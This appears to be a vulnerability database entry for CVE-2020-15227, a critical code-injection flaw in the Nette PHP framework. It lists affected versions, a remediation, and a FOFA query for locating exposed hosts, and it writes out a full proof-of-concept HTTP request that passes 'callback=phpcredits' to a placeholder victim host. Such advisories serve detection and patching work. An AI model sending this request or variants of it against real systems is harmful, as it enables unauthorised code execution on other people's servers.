| Title | Nette Framework - Remote Code Execution |
|---|---|
| Author | becivells |
| Severity | Critical |
| Impact | Successful exploitation of this vulnerability could allow an attacker to execute arbitrary code on the affected system. |
| Remediation | Apply the latest security patches provided by the Nette Framework to fix the deserialization vulnerability. |
| CVSS Score | 9.8 |
| EPSS Score | 0.93793 |
| CVE ID | CVE-2020-15227 |
| CWE ID | CWE-94,CWE-74 |
| Fofa Query | app="nette-Framework"app="nette-framework" |
| Tags | cve2020 cve nette rce vkev vuln |
Nette Framework versions before 2.0.19, 2.1.13, 2.2.10, 2.3.14, 2.4.16, and 3.0.6 are vulnerable to a code injection attack via specially formed parameters being passed to a URL. Nette is a PHP/Composer MVC Framework.
GET /nette.micro/?callback=phpcredits HTTP/1.1
Host: www.victim.com
User-Agent: Mozilla/5.0 (Kubuntu; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/137.0.0.0 Safari/537.36
Connection: close
Accept: */*
Accept-Language: en
Accept-Encoding: gzip
🔗 Nuclei Template: https://github.com/packetinside/nuclei-templates/blob/main/http/cves/2020/CVE-2020-15227.yaml
🦈 Packet Capture: ⬇️ Download cve-2020-15227.pcap
N/AN/A